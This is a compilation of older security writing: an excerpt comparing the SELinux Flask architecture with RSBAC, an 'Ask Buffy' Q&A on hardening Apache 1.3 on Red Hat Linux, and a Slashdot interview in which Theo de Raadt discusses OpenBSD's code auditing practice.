The has a well-defined architecture (named Flask) for flexible mandatory access controls that has been experimentally validated through several prototype systems (DTMach, DTOS, and Flask). The architecture provides clean separation of policy from enforcement, well-defined policy decision interfaces, flexibility in labeling and access decisions, support for policy changes, and fine-grained controls over the kernel abstractions. Detailed studies have been performed of the ability of the architecture to support a wide variety of security policies and are available on the DTOS and Flask web pages accessible via the Background page (http://www.nsa.gov/selinux/background.html). A published paper about the Flask architecture is also available on the Background page. The architecture and its implementation in Linux are described in detail in the documentation (http://www.nsa.gov/selinux/docs.html). RSBAC appears to have similar goals to the Security-Enhanced Linux. Like the Security-Enhanced Linux, it separates policy from enforcement and supports a variety of security policies. RSBAC uses a different architecture (the Generalized Framework for Access Control or GFAC) than the Security-Enhanced Linux, although the Flask paper notes that at the highest level of abstraction, the the Flask architecture is consistent with the GFAC. However, the GFAC does not seem to fully address the issue of policy changes and revocation, as discussed in the Flask paper. RSBAC also differs in the specifics of its policy interfaces and its controls, but a careful evaluation of the significance of these differences has not been performed.
SecurityPortal - Ask Buffy Apache Security
I am trying to implement security on the Apache Server 1.3.12 running on a Linux Red Hat 6.2. Are there any good docs or how-tos on this subject?
Aejaz Sheriff
Very few security problems exist with the Apache server itself. Having said that, however, I suggest that you upgrade to Apache 1.3.14, which solves some security issues. For online documentation of the Apache server the following URLs are excellent:
http://httpd.apache.org/docs/misc/security_tips.html
http://httpd.apache.org/docs/The majority of Web-based security problems come from poorly written CGI programs, online databases, and the like. Razvan Peteanu has written the following article:
http://securityportal.com/cover/coverstory20001030.html - Best Practices for Secure Web Development
And I highly recommend reading it.
Buffy ([email protected])
Who should own Apache? I have nobody as the owner and the group, but I'm not sure if this is safe or not.
Brad
The usual default for "owning" Apache is user and group root:
-rwxr-xr-x 1 root root 301820 Aug 23 13:45 /usr/sbin/httpdAs for who Apache runs as, this is usually the user and group "nobody" or "apache." In both cases, these groups are heavily restricted from accessing anything important, from the httpd.conf file:
#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.
#
# User/Group: The name (or #number) of the user/group to run httpd as.
# . On SCO (ODT 3) use "User nouser" and "Group nogroup".
# . On HPUX you may not be able to use shared memory as nobody, and the
# suggested workaround is to create a user www and use that user.
# NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
# when the value of (unsigned)Group is above 60000;
# don't use Group nobody on these systems!
#
User apache
Group apacheMost Linux distributions now have a special user and group called "apache" for running the Apache Web server. This user is locked out (no password), the home directory is usually the www root, and no command shell is available. This is slightly safer than using nobody because the "nobody" account may be used by other services. If an attacker manages to get privileges of "nobody" on the system, she may be able to elevate privileges using some other software. Segmenting "apache" with different users is a better strategy.
Buffy ([email protected])
Slashdot Theo de Raadt Respond
Q: Would you and/or other members of the OpenBSD coders consider writing a book on secure, bug-free coding and auditing? Most programming books feature sample code that is written for pedagogical purposes. Quite often this runs contrary to how secure code should be written, leaving a gap in many a programmers knowledge. A book on audinting and how to avoid security pitfalls when coding would also make your life easier - less code to audit for OpenBSD, and more time top concentrate on nifty new features!!!
Theo:
There is perhaps a split between the two issues you bring up. On the one side is secure coding, as in code written to be secure by the original author(s). On the other side, auditing, which is where an outsider (or an insider) later on goes and tries to clean up the mess which remains. And there is always a mess. Perhaps part of the problem is that a huge gap lies between these two. In the end though, I think that a book on such a topic would probably have to repeat the same thing every second paragraph, throughout the book: Understand the interfaces which you are coding to! Understand the interfaces which you are coding to! Most of the security (or simply bug) issues we audited out of our source tree are just that. The programmer in question was a careless slob, not paying attention to the interface he was using. The repeated nature of the same classes of bugs throughout the source tree, also showed us that most programmers learn to code by (bad) examples. A solid systems's approach should not be based on "but it works". Yet, time and time again, we see that for most people this is the case. They don't care about good software, only about "good enough" software. So the programmers can continue to make such mistakes. Thus, I do not feel all that excited about writing a book which would simply teach people that the devil is in the details. If they haven't figured it out by now, perhaps they should consider another occupation (one where they will cause less damage).
OpenBSD has a well deserved reputation for security "out of the box" and for the fact the inbuilt tools are as secure as they're ever likely to be. However, the Ports system is, perhaps, an example of where the secure approach currently has limitations - an installation of OpenBSD running popular third-party systems like INN can only be so secure because the auditing of INN, and other such software, is outside the scope of the BSD audit.
My question is, has the OpenBSD team ever proposed looking into how to create a 'secured ports' tree, or some other similar system, that would ensure that many of the applications people specifically want secure platforms like OpenBSD to run could be as trusted as the platforms themselves?
Theo:
We have our hands already pretty full, just researching new ideas in our main source tree, which is roughly 300MB in size. We also lightly involved ourselves in working with the XFree86 people a while back for some components there. Auditing the components outside of this becomes rather unwieldy. The difficulty lies not only in the volume of such code, but also in other issues. Sometimes communication with the maintainers of these other packages is difficult, for various reasons. Sometimes they are immediately turned off because we don't use the word Linux. Some of these portable software packages are by their nature never really going to approach the quality of regular system software, because they are so bulky.
But most importantly, please remember that we are also human beings, trying to live our lives in a pleasant way, and don't usually get all that excited about suddenly burning 800 hours in some disgusting piece of badly programmer trash which we can just avoid running. I suppose that quite often some of our auditors look at a piece of code and go "oh, wow, this is really bad", and then just avoid using it. I know that doesn't make you guys feel better, but what can we say...
With the release of SGI's B1 code, and the attempts by many U*ixen to secure their contents via capabilities, ACL's, etc, ad nausium, how is OpenBSD approaching the issue of resource control?
... ...
Theo:
On the first question, I think there is great confusion in the land of Orange Book. Many people think that is about security. It is not. Largely, those standards are about accountability in the face of threat. Which really isn't about making systems secure. It's about knowing when your system's security breaks down. Not quite the same thing. Please count the commercially deployed C, B, or even A systems which are actually being used by real people for real work, before foaming at the mouth about it all being "so great". On the other hand, I think we wil see if some parts of that picture actually start to show up in real systems, over time. By the way, I am surprised to see you list ACLs, which don't really have anything to do with B1 systems.
Did the drive to audit code come from the need or the design of BSD? Or was it initially a whim? More imporantly, where did you learn it from? Is their some "mentor" you looked too for ridge design? I have to admire your team's daunting code reviewing...I wonder if I'll ever have that kind of meticulous coding nature.
Theo:
The auditing process developed out of a desire to improve the quality of our operating system. Once we started on it, it becomes fascinating, fun, and very nearly fanatical. About ten people worked together on it, basically teaching ourselves as things went along. We searched for basic source-code programmer mistakes and sloppiness, rather than "holes" or "bugs". We just kept recursing through the source tree everytime we found a sloppiness. Everytime we found a mistake a programmer made (such as using mktemp(3) in such a way that a filesystem race occurred), we would go throughout the source tree and fix ALL of them. Then when we fix that one, we would find some other basic mistake, and then fix ALL of them. Yes, it's a lot of work. But it has a serious payback. Can you imagine if a Boeing engineer didn't fix ALL of the occurrences of a wiring flaw? Why not at least try to engineer software in the same way?